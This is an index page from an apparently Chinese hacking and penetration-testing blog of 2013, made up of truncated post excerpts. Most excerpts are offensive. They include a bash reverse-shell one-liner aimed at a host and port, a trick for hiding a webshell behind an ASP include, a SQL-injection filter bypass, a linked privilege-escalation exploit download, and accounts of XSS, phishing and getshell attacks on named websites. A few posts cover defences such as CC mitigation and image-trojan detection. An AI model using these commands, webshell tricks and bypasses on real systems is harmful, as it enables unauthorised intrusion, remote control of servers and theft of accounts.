渗透

admin 12年前 (2013-07-21) 3736浏览 2评论

这篇文章谈论简单的技术，利用sql注入(SQLi)漏洞，并获得一个webshell，所有的演示都是用DVWA（渗透测试演练系统）.对于SQL注入利用，有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助，进一步进行注入，获取帐号...

admin 12年前 (2013-07-19) 1792浏览 0评论

将大马写到一个txt文件里面，命名为dama.txt 再建一个文本文档，asp的就写入： <!–#include file=”dama.txt”–>保存为x.asp 两个文件传同目录下，...

admin 12年前 (2013-07-17) 1717浏览 0评论

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;...

admin 12年前 (2013-07-17) 1838浏览 0评论

发布日期：2011-12-08 09:00:00 浏览次数：2982 文章作者：Nuclear’Atk 网友评论：12 评论 最后修改：2012-12-04 12:40:0 关于：基于js的CC攻击实现与防御、以及图片方式的DDOS、CC...

admin 12年前 (2013-07-17) 2508浏览 3评论

2013.05.21 No Comments 前言：作者是个懒人，又犯了五月病，什么都懒得做，编辑了好几次文章，后来都不了了之了 但是时间紧迫，下个月就要跨省去外地了，看见大家好像对狗狗很有热情，所以就一口气把一篇笔记发出来了 本来没有那么长的，...

admin 12年前 (2013-07-17) 1430浏览 1评论

1、 什么是WebApp Pentesting WebApp Pentesting，由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进行测试和让黑阔们更加深刻地且透彻理...

admin 12年前 (2013-07-07) 2181浏览 0评论

前不久，我申请加入了某开源组织，他们要我写一个功能用来检测图片中是否有木马脚本。 　　其实一开始我什么也不知道，只是后来在网上查了一些资料，找到的全是有制作图片木马的教程，并没有找到检测的程序。 　　经过几番思索之后，决定从制作原理来分析这种木马程序...

admin 12年前 (2013-07-07) 1202浏览 0评论

来源：本站转载 作者：佚名 时间：2011-08-27 TAG：   昨晚黑锅在微博上发了老外爆的Nginx漏洞，开始并没几个人关注，小我马上架环境测试验证了，我人品好随手在网上试了两个网站也验证了这个漏洞，于是乎马上就在微博上传开了。 ...

admin 12年前 (2013-07-05) 4094浏览 0评论

dSploit发布真的是非常快，freebuf都感慨有点跟不上……今天官方又发布新版v1.0.23b。dSploit是一款Android平台的网络分析和渗透套件，供IT安全研究人员/极客对移动设备进行专业的安全评估。 dSploit允许你分析、捕捉和...

admin 12年前 (2013-07-04) 1543浏览 0评论

不多说 上图： windows 提权0day 下载地址：EPATHOBJExploit 本站内容均为原创，转载请务必保留署名与链接！ 刚刚捞到的提权0DAY,亲测2K3成功.:http://www.webshell.cc/4381.html ...

admin 12年前 (2013-07-02) 2426浏览 0评论

系统：ES(Unix) 例子: IvS7aeT4NzQPM 说明：Linux或者其他linux内核系统中 长度: 13 个字符 描述：第1、2位为salt，例子中的’Iv’位salt，后面的为hash值   系统：MD5(Unix) 例子：...

admin 12年前 (2013-07-01) 5144浏览 0评论

首先祝法客和众基友大牛，法客管理们，新年快乐，新的一年0day多多。 小弟拙文一篇，全文无亮点，各位大牛轻点踩，求基友交流，求基友意见，求基友指点。 排版不好，基友们凑乎看看吧。 目标站为www.aaa.com 系统是phpcms V9 利用最新暴的...

admin 12年前 (2013-07-01) 2186浏览 0评论

绕过描述： 在GET请求时，将URL的SQL注入关键字用%0A分隔，%0A是换行符，在mysql中可以正常执行。   测试方法： 请求测试url：http://www.webshell.cc/1.php?id=1%20union%20se...

admin 12年前 (2013-06-30) 1800浏览 0评论

CC攻击是一种成本极低的DDOS攻击方式，只要有上百个IP，每个IP弄几个进程，那么可以有几百上千个并发请求，很容易让服务器资源耗尽，从而 造成网站宕机;防御CC攻击，硬件防火墙的效果不怎么明显，因为CC攻击的IP量太小，很难触发防御机制，反而是软件...

admin 12年前 (2013-06-30) 4821浏览 0评论

作者：v2djia(小编) 发表于：2013-06-29 　 点击：17   什么是WPScan： WPScan是一款针对WordPress的黑盒漏洞扫描器 安装： WPScan预装在以下linux发行版中： · BackBox Linux...

admin 12年前 (2013-06-30) 1618浏览 0评论

互联网中充斥着无数个链接，我们每天上网所做的事情，就是点开一个链接，跳转到另外一个链接。可你知道你点开的这些链接在背后里都做了些什么见不得 人的事情么？   国内的大多数网民,都习惯了腾讯为他们做好的大局域网，用QQ聊天、用QQ邮箱收发邮件...

admin 12年前 (2013-06-29) 2068浏览 0评论

上一篇中介绍了圈圈网通过xss和基础钓鱼获取管理员账号口令信息，在此详细介绍。 一、基础钓鱼利用 1、登陆圈圈网http://www.ihelpoo.com/后在个人主页上可以“记录生活”，与其他位置不同的是此处图片允许从输入网络图片地址，但未对图片...

admin 12年前 (2013-06-29) 1735浏览 0评论

虽说平时也查看一些网站的whois信息，但是从来没有实质上利用过whois信息。今天跟师兄渗透一个网站时利用到了whois信息，现总结一下。 网站：http://www.ihelpoo.com。网站存在xss漏洞和对图片url没有过滤导致可以进行弹窗...

admin 12年前 (2013-06-29) 2065浏览 0评论

单位某站用的dedecms,今天被某黑阔getshell了，提交到了wooyun. 为了还原黑阔入侵的手法，用鬼哥的getshell测试居然没成功, 是不是getshell过一次，再次就不会成功呢？ 无奈只能打包代码，用各种webshell扫描器只扫...

admin 12年前 (2013-06-28) 1602浏览 0评论

浏览器搜索框劫持钓鱼 http://h43z.koding.com/blog/leaked.html 如以上网站所显示，当你按下ctrl+f 或win+f  组合键是就会弹出一个搜索框其实这个所说框是黑客所伪造的。 攻击流程：当一名攻击者将一个...